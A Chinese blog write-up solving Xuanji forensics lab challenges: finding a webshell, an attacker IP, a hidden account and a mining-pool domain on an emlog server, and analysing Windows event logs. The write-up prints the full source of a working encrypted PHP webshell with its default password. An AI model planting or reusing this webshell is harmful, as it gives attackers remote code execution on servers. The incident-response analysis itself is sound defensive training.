玄机-第四章&第五章

本文最后更新于 2025年7月24日 凌晨

Windows 实战 - emlog & evtx 文件分析

emlog

简介

1
2
3
4
5
6
7
服务器场景操作系统 Windows
服务器账号密码 administrator xj@123456

1.通过本地 PC RDP到服务器并且找到黑客植入 shell,将黑客植入 shell 的密码 作为 FLAG 提交;
2.通过本地 PC RDP到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;
3.通过本地 PC RDP到服务器并且分析黑客的隐藏账户名称,将黑客隐藏账户名称作为 FLAG 提交;
4.通过本地 PC RDP到服务器并且分析黑客的挖矿程序的矿池域名,将黑客挖矿程序的矿池域名称作为(仅域名)FLAG 提交;

找到黑客植入 shell 的密码

扫描网站根目录,找到 shell 的路径:/content/plugins/tip/shell.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

拿到密码

1
flag{rebeyond}

黑客攻击成功的 IP 为多少

查看网站配置日志,Nginx 没有日志,查看 Apache,找到使用了 shell.php 的 IP

1
flag{192.168.126.1}

黑客的隐藏账户名称

直接查看用户找到

1
flag{hacker138}

黑客的挖矿程序的矿池域名

发现隐藏账户下面有一个 Kuang 程序,拿出来 pyinstaller 解包后再 pyc 反编译

拿到域名

1
flag{wakuang.zhigongshanfang.top}

evtx 文件分析

查事件 ID:WINDOWS日志事件ID速查表

黑客成功登录系统所使用的 IP 地址

ID 为 4624 表示帐户已成功登录,直接搜索

1
flag{192.168.36.133}

黑客修改的登录用户的用户名

搜索 ID 为 4738 查找已更改的账户

1
flag{Adnimistartro}

黑客成功访问的一个关键位置的文件

ID 4663 表示尝试访问对象

1
flag{SCHEMA}

黑客最后一次重启数据库服务后数据库服务的进程 ID 号

在应用程序中,先排序找到 MySQL 的事件 ID,再筛选 ID 查看

1
flag{8820}

黑客使用修改后的用户重启系统的次数

筛选系统日志来源于 USER32 的事件,5 条重启记录,1 条 SYSTEM,2 条 Administrator、2 条 Adnimistartro

1
flag{3}

玄机-第四章&第五章
http://example.com/2025/07/24/玄机-第四章-第五章/
作者
butt3rf1y
发布于
2025年7月24日
许可协议